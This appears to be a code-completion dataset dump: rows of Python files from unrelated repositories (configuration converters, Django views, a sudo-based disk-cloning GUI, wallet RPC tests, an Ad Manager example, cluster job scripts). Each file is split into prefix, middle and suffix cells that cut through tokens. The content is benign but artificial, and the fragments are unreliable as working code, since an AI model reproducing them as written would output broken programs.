repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
twobraids/configman_orginal | configman/converters.py | Python | bsd-3-clause | 8,414 | 0.00202 | # ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is configman
#
# The Initial Developer of the Original Code is
# Mozilla Foundation
# Portions created by the Initial Developer are Copyright (C) 2011
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# K Lars Lohn, lars@mozilla.com
# Peter Bengtsson, peterbe@mozilla.com
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
import sys
import re
import datetime
import types
import inspect
import datetime_util as dtu
#------------------------------------------------------------------------------
def option_value_str(an_option):
"""return an instance of Option's value as a string.
The option instance doesn't actually have to be from the Option class. All
it requires is that the passed option instance has a ``value`` attribute.
"""
if an_option.value is None:
return ''
try:
converter = to_string_converters[type(an_option.value)]
s = converter(an_option.value)
except KeyError:
if not isinstance(an_option.value, basestring):
s = unicode(an_option.value)
else:
s = an_option.value
if an_option.from_string_converter in converters_requiring_quotes:
s = "'''%s'''" % s
return s
#------------------------------------------------------------------------------
def str_dict_keys(a_dict):
"""return a modified dict where all the keys that are anything but str get
converted to str.
E.g.
>>> result = str_dict_keys({u'name': u'Peter', u'age': 99, 1: 2})
>>> # can't compare whole dicts in doctests
>>> result['name']
u'Peter'
>>> result['age']
99
>>> result[1]
2
The reason for this is that in Python <= 2.6.4 doing
``MyClass(**{u'name': u'Peter'})`` would raise a TypeError
Note that only unicode types are converted to str types.
The reason for that is you might have a class that looks like this::
class Option(object):
def __init__(self, foo=None, bar=None, **kwargs):
...
And it's being used like this::
Option(**{u'foo':1, u'bar':2, 3:4})
Then you don't want to change that {3:4} part which becomes part of
`**kwargs` inside the __init__ method.
Using integers as parameter keys is a silly example but the point is that
due to the python 2.6.4 bug only unicode keys are converted to str.
"""
new_dict = {}
for key in a_dict:
if isinstance(key, unicode):
new_dict[str(key)] = a_dict[key]
else:
new_dict[key] = a_dict[key]
return new_dict
#------------------------------------------------------------------------------
def io_converter(input_str):
""" a conversion function for to select stdout, stderr or open a file for
writing"""
if type(input_str) is str:
input_str_lower = input_str.lower()
if input_str_lower == 'stdout':
return sys.stdout
if input_str_lower == 'stderr':
return sys.stderr
return open(input_str, "w")
return input_str
#------------------------------------------------------------------------------
def timedelta_converter(input_str):
"""a conversion function for time deltas"""
if isinstance(input_str, basestring):
days, hours, minutes, seconds = 0, 0, 0, 0
details = input_str.split(':')
if len(details) >= 4:
days = int(details[-4])
if len(details) >= 3:
hours = int(details[-3])
if len(details) >= 2:
minutes = int(details[-2])
if len(details) >= 1:
seconds = int(details[-1])
return datetime.timedelta(days=days,
hours=hours,
minutes=minutes,
seconds=seconds)
raise ValueError(input_str)
#------------------------------------------------------------------------------
def boolean_converter(input_str):
""" a conversion function for boolean
"""
return input_str.lower() in ("true", "t", "1", "y", "yes")
#------------------------------------------------------------------------------
import __builtin__
_all_named_builtins = dir(__builtin__)
def class_converter(input_str):
""" a conversion that will import a module and class name
"""
if not input_str:
return None
if '.' not in input_str and input_str in _all_named_builtins:
return eval(input_str)
parts = input_str.split('.')
try:
# first try as a complete module
package = __import__(input_str)
except ImportError:
# it must be a class from a module
package = __import__('.'.join(parts[:-1]), globals(), locals(), [])
obj = package
for name in parts[1:]:
obj = getattr(obj, name)
return obj
#------------------------------------------------------------------------------
def regex_converter(input_str):
re | turn re.compile(input_str)
compiled_regexp_type = type(re.compile(r'x'))
#------------------------------------------------------------------------------
from_string_converters = {int: int,
| float: float,
str: str,
unicode: unicode,
bool: boolean_converter,
datetime.datetime: dtu.datetime_from_ISO_string,
datetime.date: dtu.date_from_ISO_string,
datetime.timedelta: timedelta_converter,
type: class_converter,
types.FunctionType: class_converter,
compiled_regexp_type: regex_converter,
}
#------------------------------------------------------------------------------
def py_obj_to_str(a_thing):
if a_thing is None:
return ''
if inspect.ismodule(a_thing):
return a_thing.__name__
if a_thing.__module__ == '__builtin__':
return a_thing.__name__
if a_thing.__module__ == "__main__":
return a_thing.__name__
return "%s.%s" % (a_thing.__module__, a_thing.__name__)
#------------------------------------------------------------------------------
to_string_converters = {int: str,
float: str,
str: str,
unicode: unicode,
bool: lambda x: 'True' if x else 'False',
datetime.datetime: dtu.datetime_to_ISO_string,
datetime.date: dtu.date_to_ISO_string,
datetime.timedelta: dtu.timedelta_to_str,
type: py_obj_to_str,
types.FunctionType: py_obj_to_str,
compiled_regexp_type: lambda x: x. |
mesemus/fedoralink | fedoralink/views.py | Python | apache-2.0 | 15,936 | 0.002322 | import inspect
import requests
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.http import HttpResponseRedirect, FileResponse, Http404, HttpResponse
from django.shortcuts import render
from django.template import Template, RequestContext
from django.utils.translation import ugettext as _
from django.views.generic import View, CreateView, DetailView, UpdateView
from fedoralink.forms import FedoraForm
from fedoralink.indexer.models import IndexableFedoraObject
from fedoralink.models import FedoraObject
from fedoralink_ui.templatetags.fedoralink_tags import id_from_path
from fedoralink_ui.models import ResourceType
from .utils import get_class, fullname
class GenericGetView():
def getChildTemplate(self, type, templateType):
# TODO: more templates
if templateType == 'edit' or templateType == 'create':
return FedoraObject.objects.filter(
pk=type.templates_edit[0]).get()
if templateType == 'view':
return FedoraObject.objects.filter(
pk=type.templates_view[0]).get()
def get(self, rdf_meta, templateType):
for rdf_type in rdf_meta:
retrieved_type = list(ResourceType.objects.filter(rdf_types=rdf_type))
if retrieved_type: break
template_url = None
for type in retrieved_type:
if ('type/' in type.id):
child = self.getChildTemplate(type=type, templateType=templateType)
for template in child.children:
template_url = template.id
return template_url
class GenericIndexView(View):
app_name = None
def get(self, request):
return HttpResponseRedirect(reverse(self.app_name + ':rozsirene_hledani', kwargs={'parametry': ''}))
# noinspection PyUnresolvedReferences
class Fedor | aTemplateMixin:
def get_template_names(self):
if self.object:
templates = [fullname(x).replace('.', '/') + '/_' + self.template_type + '.html'
for x in inspect.getmro(type(self.object))]
templates. | append(self.template_name)
return templates
return super().get_template_names()
class GenericDownloadView(View):
model = None
def get(self, request, bitstream_id):
attachment = self.model.objects.get(pk=bitstream_id.replace('_', '/'))
bitstream = attachment.get_bitstream()
resp = FileResponse(bitstream.stream, content_type=bitstream.mimetype)
resp['Content-Disposition'] = 'inline; filename="' + attachment.filename
return resp
class GenericChangeStateView(View):
model = None
def post(self, request, pk):
raise Exception("Not implemented yet ...")
class GenericIndexerView(View):
model = FedoraObject
template_name = 'fedoralink_ui/indexer_view.html'
list_item_template = 'fedoralink_ui/indexer_resource_view.html'
orderings = ()
default_ordering = ''
facets = None
title = None
create_button_title = None
# noinspection PyCallingNonCallable
def get(self, request, parametry):
if isinstance(self.model, str):
self.model = get_class(self.model)
if self.facets and callable(self.facets):
requested_facets = self.facets(request, parametry)
else:
requested_facets = self.facets
requested_facet_ids = [x[0] for x in requested_facets]
data = self.model.objects.all()
if requested_facets:
data = data.request_facets(*requested_facet_ids)
if 'searchstring' in request.GET and request.GET['searchstring'].strip():
data = data.filter(solr_all_fields=request.GET['searchstring'].strip())
for k in request.GET:
if k.startswith('facet__'):
values = request.GET.getlist(k)
k = k[len('facet__'):]
q = None
for v in values:
if not q:
q = Q(**{k: v})
else:
q |= Q(**{k: v})
if q:
data = data.filter(q)
sort = request.GET.get('sort', self.default_ordering or self.orderings[0][0])
if sort:
data = data.order_by(*[x.strip() for x in sort.split(',')])
page = request.GET.get('page')
paginator = Paginator(data, 10)
try:
page = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
page = paginator.page(paginator.num_pages)
return render(request, self.template_name, {
'page': page,
'data': data,
'item_template': self.list_item_template,
'facet_names': {k: v for k, v in requested_facets},
'searchstring': request.GET.get('searchstring', ''),
'orderings': self.orderings,
'ordering': sort,
'title': self.title,
'create_button_title': self.create_button_title
})
class GenericLinkTitleView(DetailView, FedoraTemplateMixin):
prefix = None
template_name = None
def get_queryset(self):
return FedoraObject.objects.all()
def get_object(self, queryset=None):
pk = self.prefix + self.kwargs.get(self.pk_url_kwarg, None).replace("_", "/")
self.kwargs[self.pk_url_kwarg] = pk
retrieved_object = super().get_object(queryset)
if not isinstance(retrieved_object, IndexableFedoraObject):
raise Exception("Can not use object with pk %s in a generic view as it is not of a known type" % pk)
return retrieved_object
class GenericLinkView(View):
model = FedoraObject
template_name = 'fedoralink/link_view.html'
base_template = 'please_set_base_template_for_generic_link_view'
list_item_template = 'please_set_item_template_for_generic_link_view'
orderings = ()
default_ordering = ''
facets = None
title = None
create_button_title = None
# noinspection PyCallingNonCallable
def get(self, request, parametry):
if isinstance(self.model, str):
self.model = get_class(self.model)
if self.facets and callable(self.facets):
requested_facets = self.facets(request, parametry)
else:
requested_facets = self.facets
requested_facet_ids = [x[0] for x in requested_facets]
data = self.model.objects.all()
if requested_facets:
data = data.request_facets(*requested_facet_ids)
if 'searchstring' in request.GET and request.GET['searchstring'].strip():
data = data.filter(solr_all_fields=request.GET['searchstring'].strip())
for k in request.GET:
if k.startswith('facet__'):
values = request.GET.getlist(k)
k = k[len('facet__'):]
q = None
for v in values:
if not q:
q = Q(**{k: v})
else:
q |= Q(**{k: v})
if q:
data = data.filter(q)
sort = request.GET.get('sort', self.default_ordering or self.orderings[0][0])
if sort:
data = data.order_by(*[x.strip() for x in sort.split(',')])
page = request.GET.get('page')
paginator = Paginator(data, 10)
try:
page = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
page = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
page = paginator.page(paginator.num_pages)
return render(request, self.template_name, {
'page': page,
'data': data,
'base_template': self.base_template,
'item_template': self |
PointyShinyBurning/cpgintegrate | cpgintegrate/airflow/__init__.py | Python | agpl-3.0 | 788 | 0.005076 | from airflow import DAG
from cpgintegrate.airflow.cpg_airflow_plugin import CPGDatasetToXCom, XComDatasetToCkan
def dataset_list_subdag(dag_id, start_date, connector_class, connection_id, | ckan_connection_id, ckan_package_id, pool,
dataset_list):
subdag = DAG(dag_id, start_date=start_date)
with subdag as dag:
for d | ataset in dataset_list:
pull = CPGDatasetToXCom(task_id=dataset, connector_class=connector_class, connection_id=connection_id,
dataset_args=[dataset], pool=pool)
push = XComDatasetToCkan(task_id=dataset + '_ckan_push',
ckan_connection_id=ckan_connection_id, ckan_package_id=ckan_package_id)
pull >> push
return subdag
|
TeskeVirtualSystem/CloneInterface | clone.py | Python | gpl-2.0 | 8,341 | 0.031066 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################
# _______ ______ #
# |_ _\ \ / / ___| #
# | | \ \ / /\___ \ #
# | | \ V / ___) | #
# |_| \_/ |____/ #
# #
###################################
# TVS DClone Tool #
# Version 1.0 #
# By: Teske Virtual Systems #
# This tool is release under #
# GPL license, for more #
# details see license.txt file #
###################################
# http://www.teske.net.br #
###################################
import commands
import subprocess
import re
import threading
import signal
import signal
import sys
import os
import gtk
import time
import urllib
import cgi
import math
from simplejson import dumps as to_json
from simplejson import loads as from_json
from webgui import start_gtk_thread
from webgui import launch_browser
from webgui import synchronous_gtk_message
from webgui import asynchronous_gtk_message
from webgui import kill_gtk_thread
disks = []
def LoadDisks():
global disks
x = commands.getstatusoutput("gksudo -D \"DClone Tool\" ./utils.sh")
if x[0] != 0 and x[0] != 256:
print "Este aplicativo precisa das permissões de administrador para funcionar!"
label = gtk.Label("Este aplicativo precisa de permissões de administrador para funcionar.")
dialog = gtk.Dialog("DClone Tool", None, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT, (gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))
dialog.vbox.pack_start(label)
label.show()
dialog.run()
dialog.destroy()
sys.exit(1)
dk = commands.getoutput("sudo ./utils.sh -g")
dk = dk.split(',')
for disk in dk:
dsk = commands.getoutput("sudo ./utils.sh -s "+disk)
model = commands.getoutput("sudo ./utils.sh -m "+disk)
dsk = dsk.split(' ')
print dsk
if dsk[1] == 'GB':
dsk[0] = float(dsk[0].replace(",",".")) * 1000
elif dsk[1] == 'KB':
dsk[0] = float(dsk[0].replace(",",".")) / 1000
else:
dsk[0] = float(dsk[0].replace(",","."))
dpk = (disk,dsk[0],model)
disks.append(dpk)
def buffered(f):
a = []
while True:
c = f.read(1)
if c == '':
break
elif c == '\r':
yield ''.join(a)
a = []
else:
a.append(c)
class dcfldd:
LINE_MATCH = re.compile(r'\[(.*)\% of (.*)Mb\] (.*) blocks \((.*)Mb\) written. (.*) remaining')
def __init__(self, diskfrom, diskto, totalsize):
global started_copy
if not started_copy:
cmdline = ['/usr/bin/sudo', '/usr/bin/dcfldd', 'sizeprobe=if', 'if='+diskfrom, 'of='+diskto]
print "Iniciando copia de "+diskfrom+" para "+diskto+" no total de "+str(totalsize)+" Mb"
self.process = subprocess.Popen(cmdline, stderr=subprocess.PIPE)
self.thread = threading.Thread(target=self.watch, args=[self.process.stderr])
self.thread.start()
started_copy = True
self.total = totalsize
def kill(self):
os.kill(self.process.pid, signal.SIGINT)
def watch(self, f):
global web_send
for line in buffered(f):
result = self.LINE_MATCH.match(line)
if result:
result = result.groups()
percent = result[0]
self.total = result[1]
mb = result[3]
time = result[4]
sys.stdout.write('%s Mb / %s Mb (%s%% restantes)\r' % (mb, self.total, percent))
sys.stdout.flush()
web_send('updateProgress('+str(mb)+','+str(self.total)+', "'+time+'");');
class Global(object):
quit = False
@classmethod
def set_quit(cls, *args, **kwargs):
cls.quit = True
def nl2br(string, is_xhtml= True ):
if is_xhtml:
return string.replace('\n','<br />')
else :
return string.replace('\n','<br>')
def main():
global disks
global browser
global web_send
global started_copy
global dcfprocess
global window
dcfprocess = None
start_gtk_thread()
started_copy = False
file = os.path.abspath('page.html')
uri = 'file://' + urllib.pathname2url(file)
browser, web_recv, web_send, window = synchronous_gtk_message(launch_browser)(uri,quit_function=Global.set_quit,echo=False,width=640,height=640)
browser.connect("navigation-requested", on_navigation_requested)
while not Global.quit:
time.sleep(1)
def ProcessDiskData(line):
linedata = line.split(None,6)
while len(linedata) < 7:
linedata.append('')
return linedata
def ProcessType(type):
return cgi.escape(type.replace('primary',"Primária").replace('extended',"Extendida").replace('logic',"Lógica"))
def BuildDiskDataHTML(data,disk):
diskdata = GetLoadedDiskData(disk)
base = 'Modelo: '+cgi.escape(diskdata[2])+'<BR>Tamanho total: '+str(diskdata[1])+' MB<BR><center><table width="502" border="0" cellpadding="0" cellspacing="0" style="color: | #FFFFFF"> \
<tr> \
<th width="34" height="19" valign="top">ID</td> \
<th width="93" valign="top">Tamanho</td> \
<th width="106" valign="top">Tipo</td> \
<th width="160" valign="top">Sistema de Arquivos </td> \
<th width="109" valign="top">Sinalizador</td> \
</tr> '
dk = data.split('\ | n')
for line in dk:
id, inicio, fim, tamanho, tipo, fs, sig = ProcessDiskData(line)
base += '<tr><td height="19" valign="top"><center>'+id+'</center></td><td valign="top"><center>'+tamanho+'</center></td><td valign="top"><center>'+ ProcessType(tipo)+'</center></td><td valign="top"><center>'+fs.upper()+'</center></td><td valign="top"><center>'+sig+'</center></td></tr>'
base += '</table></center>'
return base.replace('\n','')
def OpenSaveFile():
global window
filename = None
chooser = gtk.FileChooserDialog("Salvar imagem", window, gtk.FILE_CHOOSER_ACTION_SAVE, (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_SAVE, gtk.RESPONSE_OK))
response = chooser.run()
if response == gtk.RESPONSE_OK: filename = chooser.get_filename()
chooser.destroy()
return filename
def OpenLoadFile():
global window
filename = None
chooser = gtk.FileChooserDialog("Abrir imagem", None ,gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
chooser.set_default_response(gtk.RESPONSE_OK)
chooser.set_modal(False)
response = chooser.run()
if response == gtk.RESPONSE_OK:
filename = chooser.get_filename()
chooser.destroy()
return filename
def GetLoadedDiskData(disk):
global disks
for dsk in disks:
if dsk[0] == disk:
return dsk
return (None,None,None)
def on_navigation_requested(view, frame, req, data=None):
global dcfprocess
uri = req.get_uri()
scheme, function, data =uri.split(':', 2)
if scheme == 'callback':
print uri
if function == '//loaddisks':
for disk in disks:
web_send('addDisk(\''+disk[0]+'\',\''+disk[2]+'\');');
#web_send('addDisk(\'RAW\',\'Arquivo\');');
elif function == '//loaddiskdata':
data = data.split(':')
disk_data = commands.getoutput("sudo ./utils.sh -d "+data[1])
#html_data = nl2br(cgi.escape(disk_data))
html_data = BuildDiskDataHTML(disk_data,data[1])
if data[0] == 'origem':
web_send('setDisk(\''+html_data+'\',true)');
else:
web_send('setDisk(\''+html_data+'\',false)');
elif function == '//startclone':
data = data.split(':')
origindata = GetLoadedDiskData(data[1])
print "Disco Origem: "
print origindata
destindata = GetLoadedDiskData(data[2])
print "Disco Destino: "
print destindata
print "Iniciando dcfldd para /dev/null"
dcfprocess = dcfldd(data[1],data[2], origindata[1])
elif function == '//selectfilesource':
filename = OpenLoadFile()
print filename
if not filename == None:
web_send('addDiskOrg(\''+filename+'\',\'RAW\');');
elif function == '//selectfiledestiny':
filename = OpenSaveFile()
print filename
if not filename == None:
web_send('addDiskDest(\''+filename+'\',\'RAW\');');
elif function == '//exit':
sys.exit(0)
return True
else:
return False
def my_quit_wrapper(fun):
signal.signal(signal.SIGINT, Global.set_quit)
def fun2(*args, **kwargs):
try:
x = fun(*args, **kwargs) # equivalent to "apply"
finally:
kill_gtk_thread()
Global.set_quit()
if dcfprocess != None:
dcfprocess.kill()
|
ionomy/ion | test/functional/wallet-accounts.py | Python | mit | 5,217 | 0.00345 | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Copyright (c) 2018-2020 The Ion Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [["-paytxfee=0.0001"]]
def run_test(self):
node = self.nodes[0]
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/500 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 10875000.00000000)
# there should be 2 address groups
# each with 1 address with a balance of 500 Ion
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 102)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
#assert_equal(address_group[0][1], 0.00000000)
linked_addresses.add(address_group[0][0])
# send 500 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
common_address = "gRd8PtjGrSRA8vrASoUz66wu6zsUBW9FX9"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 1000},
minconf=1,
addlocked=False,
comment="",
subtractfeefrom=[common_address],
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 102)
assert_equal(len(address_groups[0]), 1)
#assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
#assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
node.sendfrom("", common_address, fee)
accounts = ["a", "b", "c", "d", "e"]
amount_to_send = 1.0
account_addresses = dict()
for account in accounts:
address = node.getaccountaddress(account)
account_addresses[account] = address
node.getnewaddress(account)
assert_equal(node.getaccount(address), account)
assert(address in node.getaddressesbyaccount(account))
node.s | endfrom("", address, amount_to_send)
node.generate(1)
for i in range(len(accounts)):
from_account = acco | unts[i]
to_account = accounts[(i+1) % len(accounts)]
to_address = account_addresses[to_account]
node.sendfrom(from_account, to_address, amount_to_send)
node.generate(1)
for account in accounts:
address = node.getaccountaddress(account)
assert(address != account_addresses[account])
assert_equal(node.getreceivedbyaccount(account), 2)
node.move(account, "", node.getbalance(account))
node.generate(51)
expected_account_balances = {"": 17624000.00000000}
for account in accounts:
expected_account_balances[account] = 0
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 17624000.00000000)
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account)
assert(address in node.getaddressesbyaccount(account))
assert(address not in node.getaddressesbyaccount(""))
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account)
node.sendfrom("", multisig_address, 50)
node.generate(51)
for account in accounts:
assert_equal(node.getbalance(account), 50)
if __name__ == '__main__':
WalletAccountsTest().main()
|
CyberReboot/vcontrol | tests/test_rest_providers_remove.py | Python | apache-2.0 | 2,487 | 0.00201 | """ Test for t | he remove.py module in the vcontrol/rest/providers directory """
from os import remove as delete_file
from web import threadeddict
from vcontrol.rest.providers import remove
PROVIDERS_FILE_PATH = "../vcontrol/rest/providers/providers.txt"
class ContextDummy():
env = threadeddict()
env['HTTP_HOST'] = 'localhost:8080'
class WebDummy():
# dummy class to emulate the web.ctx.env call in remove.py
ctx = ContextDummy()
def tes | t_successful_provider_removal():
""" Here we give the module a text file with PROVIDER: written in it,
it should remove that line in the file """
remove_provider = remove.RemoveProviderR()
remove.web = WebDummy() # override the web variable in remove.py
test_provider = "PROV"
expected_providers_contents = ['What:\n', 'Test:'] # what we expect to see in providers.txt after we call GET
# create the file
with open(PROVIDERS_FILE_PATH, 'w') as f:
f.writelines([
"What:",
"\n",
test_provider + ":",
"\n",
"Test:"
])
assert remove_provider.GET(test_provider) == "removed " + test_provider
# read the file and see if it has removed the line with the test_provider
with open(PROVIDERS_FILE_PATH, 'r') as f:
provider_contents = f.readlines()
delete_file(PROVIDERS_FILE_PATH) # delete the file
assert provider_contents == expected_providers_contents
def test_unsuccessful_provider_removal():
""" Here we give the module a text file without the provider written in it,
it should tell us that it couldn't find the provider we gave it as an argument"""
remove_provider = remove.RemoveProviderR()
remove.web = WebDummy() # override the web variable in remove.py
test_provider = "PROV"
expected_providers_contents = ['What:\n', 'NOTPROV:\n', 'Test:'] # what we expect to see in providers.txt after GET
# create the file
with open(PROVIDERS_FILE_PATH, 'w') as f:
f.writelines([
"What:",
"\n",
"NOTPROV:",
"\n",
"Test:"
])
assert remove_provider.GET(test_provider) == test_provider + " not found, couldn't remove"
# read the file and see if it's the same
with open(PROVIDERS_FILE_PATH, 'r') as f:
provider_contents = f.readlines()
delete_file(PROVIDERS_FILE_PATH) # delete the file
assert provider_contents == expected_providers_contents
|
jiadaizhao/LeetCode | 0101-0200/0131-Palindrome Partitioning/0131-Palindrome Partitioning.py | Python | mit | 711 | 0.002813 | class Solution:
def partition(self, s: str) -> List[List[str]]:
palindrome = [[False]*len(s) for _ in | range(len(s))]
for j in range(len(s)):
for i in range(j + 1):
if s[i] == s[j] and (j - i < 2 or palindrome[i+1][j-1]):
palindrome[i][j] = True
result = []
path = []
def dfs(start):
if start == len(s):
result.append(path[:])
return
for i in range(start, len(s)):
if palindrome[start][i]:
path.append(s[start:i+1])
| dfs(i + 1)
path.pop()
dfs(0)
return result
|
googleads/googleads-python-lib | examples/ad_manager/v202111/activity_group_service/update_activity_groups.py | Python | apache-2.0 | 2,745 | 0.0051 | #!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by appli | cable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CON | DITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates activity groups.
To determine which activity groups exist, run get_all_activity_groups.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the activity group and the company to update it with.
ACTIVITY_GROUP_ID = 'INSERT_ACTIVITY_GROUP_ID_HERE'
ADVERTISER_COMPANY_ID = 'INSERT_ADVERTISER_COMPANY_ID_HERE'
def main(client, activity_group_id, advertiser_company_id):
# Initialize appropriate service.
activity_group_service = client.GetService('ActivityGroupService',
version='v202111')
# Create statement object to select a single activity groups by ID.
statement = (ad_manager.StatementBuilder(version='v202111')
.Where('id = :activityGroupId')
.WithBindVariable('activityGroupId', int(activity_group_id))
.Limit(1))
# Get activity groups by statement.
response = activity_group_service.getActivityGroupsByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
updated_activity_groups = []
for activity_group in response['results']:
activity_group['companyIds'].append(advertiser_company_id)
updated_activity_groups.append(activity_group)
# Update the activity groups on the server.
activity_groups = activity_group_service.updateActivityGroups(
updated_activity_groups)
for activity_group in activity_groups:
print(('Activity group with ID "%s" and name "%s" was updated.')
% (activity_group['id'], activity_group['name']))
else:
print('No activity groups found to update.')
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, ACTIVITY_GROUP_ID, ADVERTISER_COMPANY_ID)
|
sjpfenninger/sandpile | sandpile/cluster.py | Python | mit | 4,792 | 0.000626 | """
Run on cluster
"""
import argparse
import os
import itertools
import networkx as nx
import pandas as pd
from . import compare_cases
def generate_run(graph, iterations, epsilon_control, epsilon_damage,
                 out_dir, nodes=None, mem=6000, runtime=120, activate=''):
    """
    Generate bash scripts for an array run in qsub/bsub cluster environments

    ``graph`` (string): can be either "regular", "scalefree", or the
    path to a GraphML file.

    ``nodes`` must be given if graph is regular or scalefree.

    ``mem`` (int): requested memory per job, in MB.

    ``runtime`` (int): requested wall-clock limit per job (bsub only).

    Other default parameters as specified in the corresponding ``run_``
    functions in compare_cases.py are used, and cannot be overriden here.

    ``activate`` (string): additional commands to execute before calling
    sandpile (e.g. activating a virtualenv)

    Writes into ``out_dir``: ``array_run.sh`` (per-task dispatcher),
    ``run_bsub.sh`` and ``run_qsub.sh`` (scheduler submission scripts),
    ``prep.sh`` (working-dir setup) and ``iterations.csv`` (the parameter
    grid, one row per task index).
    """
    if graph == 'regular' or graph == 'scalefree':
        assert nodes is not None

    # One task per (epsilon_control, epsilon_damage) combination.
    runs = [i for i in itertools.product(epsilon_control, epsilon_damage)]
    name = out_dir.replace("/", "_")

    df_runs = pd.DataFrame(runs, columns=['epsilon_control', 'epsilon_damage'])
    df_runs.to_csv(os.path.join(out_dir, 'iterations.csv'))

    # Build a shell "case" dispatcher mapping task index -> sandpile call.
    strings = ['#!/bin/sh\ncase "$1" in\n']
    for index, run in enumerate(runs):
        e1, ed = run
        if nodes:
            nodes_string = '--nodes={}'.format(nodes)
        else:
            nodes_string = ''
        run_string = ('{idx}) {act}\n'
                      'sandpile {idx} {G} {i} {e1} {ed} {nodes}\n'
                      ';;\n'.format(idx=index + 1,
                                    G=graph, i=iterations,
                                    e1=e1, ed=ed,
                                    nodes=nodes_string,
                                    act=activate))
        strings.append(run_string)
    strings.append('esac')

    # LSF (bsub) job-array submission script.
    # (Reconstructed: the '#BSUB -W' line and the LSB_JOBINDEX reference
    # were garbled in the previous revision.)
    bsub_run_str = ('#!/bin/sh\n'
                    '#BSUB -J {name}[1-{to}]\n'
                    '#BSUB -R "rusage[mem={mem}]"\n'
                    '#BSUB -n 1\n'
                    '#BSUB -W {runtime}\n'
                    '#BSUB -o logs/run_%I.log\n\n'.format(name=name,
                                                          to=index + 1,
                                                          mem=mem,
                                                          runtime=runtime))
    bsub_run_str += './array_run.sh ${LSB_JOBINDEX}\n'

    # SGE (qsub) job-array submission script.
    qsub_run_str = ('#!/bin/sh\n'
                    '#$ -t 1-{to}\n'
                    '#$ -N {name}\n'
                    '#$ -j y -o logs/run_$TASK_ID.log\n'
                    '#$ -l mem_total={mem:.1f}G\n'
                    '#$ -cwd\n'.format(name=name, to=index + 1,
                                       mem=mem / 1000))
    qsub_run_str += './array_run.sh ${SGE_TASK_ID}\n'

